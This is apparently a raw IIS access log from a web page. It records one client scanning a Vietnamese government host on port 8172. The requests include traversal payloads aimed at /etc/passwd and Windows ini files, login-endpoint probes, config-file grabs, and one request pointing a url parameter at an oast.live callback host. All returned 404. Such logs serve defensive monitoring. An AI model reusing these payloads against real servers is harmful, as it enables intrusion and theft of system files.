2023-06-24 21:47:32 103.153.214.94 GET /admin/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 24
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-24 22:24:57
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 28
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 24
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 23
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 30
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 24
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 24
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 23
2023-06-24 22:24:57 103.153.214.94 POST /libs/granite/core/content/login.html/j_security_check - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/libs/granite/core/content/login.html 404 7 0 22
2023-06-24 22:34:33 103.153.214.94 GET /index.php option=com_jejob&amp;view=../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 28
2023-06-24 22:38:25 103.153.214.94 GET /manage/log/view base=../../../../../../../../../../&amp;filename=/windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-06-24 22:38:25 103.153.214.94 GET /log/view base=../../../../../../../../../../&amp;filename=/windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 23
2023-06-24 22:38:26 103.153.214.94 GET /manage/log/view base=../../../../../../../../../../&amp;filename=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 22
2023-06-24 22:38:26 103.153.214.94 GET /log/view base=../../../../../../../../../../&amp;filename=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 22
2023-06-24 22:51:14 103.153.214.94 GET /searchblox/servlet/FileServlet col=9&amp;url=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 28
2023-06-24 22:51:52 103.153.214.94 GET /index.php r=i/../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-06-24 22:58:05 103.153.214.94 POST /ztp/cgi-bin/handler - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-24 23:07:23 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&amp;option=com_weberpcustomer 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 27
2023-06-24 23:09:35 103.153.214.94 GET /core/config/databases.yml - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 28
2023-06-24 23:14:25 103.153.214.94 GET /opm/read_sessionlog.php logFile=....//....//....//....//etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 31
2023-06-24 23:18:29 103.153.214.94 GET /OA_HTML/ibeCAcpSSOReg.jsp - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
2023-06-24 23:22:28 103.153.214.94 GET /config/databases.yml - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 29
2023-06-24 23:22:41 103.153.214.94 GET /registerUser.html init=1 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 26
2023-06-24 23:26:09 103.153.214.94 GET /composer/send_email to=YFMG@KGIS&amp;url=http://cibehhqofm2ke57n2m2gjsshuornm681c.oast.live 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 28
2023-06-24 23:30:52 103.153.214.94 GET /WEBACCOUNT.CGI OkBtn=++Ok++&amp;RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&amp;USEREDIRECT=1&amp;WEBACCOUNTID&amp;WEBACCOUNTPASSWORD 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 27
2023-06-24 23:42:01 103.153.214.94 GET /index.php download=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 26
</pre><center><hr width="920" color="black"/> <center>

</BODY>

</HTML>